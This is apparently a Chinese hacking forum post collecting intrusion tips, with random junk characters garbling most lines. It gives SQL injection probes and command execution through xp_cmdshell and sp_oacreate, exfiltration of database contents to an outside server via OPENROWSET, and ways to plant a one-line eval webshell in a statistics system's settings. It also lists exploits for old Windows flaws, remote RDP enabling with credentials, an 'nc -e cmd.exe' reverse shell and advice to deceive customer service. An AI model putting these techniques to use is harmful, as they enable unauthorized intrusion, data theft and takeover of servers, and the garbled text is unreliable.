SA点数据库分离技术相关' [5 a9 @/ Y: {* p* P
5 j: G' @* \- G' b7 M- B4 ]) ^9 n3 r1 g8 c: \; U
SA点数据库分离搞法+语句:
4 q& T- w4 l) P9 E$ D: f: g
$ |. s4 E3 c5 \ T注射点不显错,执行下面三条语句页面都返回正常。* c! b* B% _6 \8 Q) R3 l
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
B, |5 n; M) N* }/ s {; c! Wand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
1 y8 s; Q: Z; y- B rand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
0 A1 @1 F9 G9 D' _3 K# Z可以列目录,判断系统为2000,web与数据库分离4 M8 R l' f& j1 e2 T
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
5 E: C& c5 u6 D/ |* U& T G在注射点上执行
l* G3 \0 Z) {6 ` Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--: k3 o" p+ {2 b/ n3 b6 ^# U
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
" b& F# n% N; V4 _5 l2 W0 p& L6 k还有我用NC监听得其他端口都没有得到IP。
N) E, B; y: o. x/ P1 X: i" u0 K! a8 c- T' ]
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
. F% I% Q( ]$ I8 O# s; Z'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--/ o6 @0 ?8 z7 _" y2 S
% n& I8 R4 }/ I6 I
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--! ^( b0 o4 \2 M d8 n6 z
$ O; `- a6 M2 p8 {: m现在就猜想是不是数据库是内网而且不能连外网。7 `: g/ y8 ?- p4 D
& ]4 H' j8 n- J7 o( A* r$ S& f
: v8 H- F; W) [/ y7 N4 taccess导出txt文本代码
/ y2 R% m0 Z, V! G" k8 u8 jSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
. ^2 H" w: X; A1 @" z* a
1 T- `5 P$ k: W: m- U+ c& m
8 A1 \- ?! v9 a1 c. O- O6 Q* |
* m" O' N4 R* S( Y% n自动跳转到指定网站代码头7 w/ a3 S0 g3 x& {) T" e4 M0 a3 v
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>3 w! K [( d1 j6 a( a* e
; ?+ r/ P$ @! C% J9 L9 b2 w
' P" z. b9 o8 N
入侵java or jsp站点时默认配置文件路径:6 ^5 W. A: R& l# P0 a; u3 T: z b
\web-inf\web.xml
2 |8 z" B! p! G vtomcat下的配置文件位置:2 K9 b: A: h) r7 n
\conf\server.xml (前面加上tomcat路径)) m2 d1 R5 O& p; N; c
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml; c0 I8 G; D( k
" j) O; u& Q/ L; {2 b
+ z2 r2 O& f7 o& B# Z3 ]6 I
7 i" k/ b6 R' {8 q9 D7 h5 O检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
9 @$ ^ X- W3 T-1%23" n" v' e" m+ N2 `
>
* x( Q" Z1 L* Y' G6 W5 k' H<
8 I4 H! c& K/ x2 f1'+or+'1'='1' I6 H$ d8 B( c+ k
id=8%bf* b" S6 [2 U% c7 N w- }5 y5 \
8 M$ Z2 @% k' ^& l全新注入点检测试法:
# m. c# G$ N0 w. y3 c) x. X7 h. ^在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。, b0 S$ Z0 B) ~9 H; r6 j
# x# T, R* h( s9 b6 V
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。0 O5 ~% R& x+ J0 x8 f9 k% z
- z5 O6 V! ~% [. G2 n; |搜索型注入判断方法:! a& c7 l" m' J/ X$ G
北京%' and '1'='1' and '%'='
+ g' M6 g" i5 M* Q北京%' and '1'='2' and '%'='
1 s0 t" A1 g5 U, G% w) H9 r* e2 t- l$ F. N c' B' D
- \8 i) F: z/ L4 H1 FCOOKIES注入:' M, h* `" x( p$ [, }$ ]9 O
6 H7 @3 Q2 z* {: e) ejavascript:alert(document.cookie="id="+escape("51 and 1=1"));" `8 F2 N/ G4 t- w
6 |/ L A/ Q- Z% o/ e) V: r5 ~) z4 _
2000专业版查看本地登录用户命令:. I' g6 e" h7 O7 P1 k8 X$ Z( x
net config workstation/ F& F& g! Y/ U4 H
{- d6 v" R* p, w
9 v+ f% D6 B5 f2003下查看ipsec配置和默认防火墙配置命令:3 i0 Y, n, d. f! H
netsh firewall show config& c0 y0 s: F- s# F+ Z
netsh ipsec static show all& }) R7 g% ?, V
8 @& ]0 w; c$ G3 h不指派指定策略命令:' }+ F5 Y+ q$ E4 T( w
netsh ipsec static set policy name=test assign=n (test是不指派的策略名), V" Z$ D( e$ a* x) m
netsh ipsec static show policy all 显示策略名
! H$ W+ A1 ?" q5 e
_; {& ~: `9 N9 c% J* e% a6 M* b. x i) S4 j2 r1 ^/ Z' w: f5 N/ u
猜管理员后台小技巧:% f, J Z+ i) i5 m: R
admin/left.asp & \ x5 p. T- [8 k d' T$ }) o1 X! w0 W
admin/main.asp- L4 s( Q" X' N j+ I0 x C
admin/top.asp
2 Z3 e, Q. E6 o4 Hadmin/admin.asp % Z$ N' V4 |: d9 `8 u
会现出菜单导航,然后迅雷下载全部链接
: }3 ]! e) P& x" O7 U2 e- O0 p: x. \# A, y/ e5 Z
0 f( m( A" j% `" C
社会工程学:
) S4 p! Z8 Y: G- T用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人' j3 k, ]; @4 x6 j- I! C
然后去骗客服9 H# h o$ ?+ m" i: f
2 `! `. x6 |; M3 b* Q. j7 H4 F* C2 k
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: & k: D* m: M) L" c
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
' x, B2 [" \2 C* j: z 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
" Z; U9 ~, p7 S9 P- ^' {' @4 e$ W, X$ S
$ v! V* d( `/ J# ^) @2 o( j* Z' \3 T, E- \; x) p
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)! L* I P* ~, _$ h
* N) I/ o& ], \. W6 M \& H/ t
; q5 u( f* V' ^9 C2 t1 e6 q1 v
4 h6 {/ p" @& iCMD加密注册表位置
0 U5 _. D& s% k2 j7 }+ d3 t' i$ P' C(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
: \1 O& C3 h6 IAutoRun
8 D$ \ A! V* ^- _5 u. J* I: G( E$ D- s7 e. w% o M" j* w
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor9 l. m+ ^6 _1 Q% m
AutoRun; a; o7 |9 |9 `) Y' r
e- _2 Y7 s& u% u- w
& w4 f+ I5 P3 n, r在找注入时搜索Hidden,把他改成test" e0 `6 Z [! h" Q
! c- [% R( k8 k4 G; \+ P! z4 x8 y/ ^$ \! E) K% p
$ s& G8 }, S4 A/ i
mstsc /v:IP /console ; N1 V7 r5 E7 l/ E# g" l
# T" y" i1 V& `0 `7 z+ e
: a- k7 D% g6 x( g一句话开3389:
( Q0 U: v- i# F# Q* I/ N6 A" p' X+ `& T" z+ H2 e
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> ; Q1 X( f. N N) h
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.5 V; G" U. q# s
2 q7 S( [! L# k. A# N4 |' ] Q/ }8 [
& A5 f1 ^8 ~) P$ [. ]* ^0 d8 T
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
! G" L# N$ b- M# M3 T; NInsert into admin(user,pwd) values('test','test')
$ F, q$ G( r( L8 ?3 [/ Z0 W1 a3 b0 g- Z; h: }% Y' X, a
\, P4 ?9 _" w) x+ W. k
NC反弹
6 q7 j" {4 S P* r- `先在本机执行: nc -vv -lp 监听的端口 (自己执行)
- v1 V/ L! ~& G+ |# Y Q7 H然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)% G7 j" E- }% x* _' J9 H- l
$ r9 M) }/ f9 h W* U
( [- l$ c0 H/ E/ G4 n9 x. C) ^" Z) \在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
h+ [+ _# z- B2 o* T& O3 E( x+ i' |: i# i4 U" [+ N
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录( V5 Z! ]; |8 @
例如:/ m2 g: w# p: c6 l/ d, ~7 d
subst k: d:\www\ 用d盘www目录替代k盘! @5 O) d% D) Y. \ `
subst k: /d 解除K盘代替 |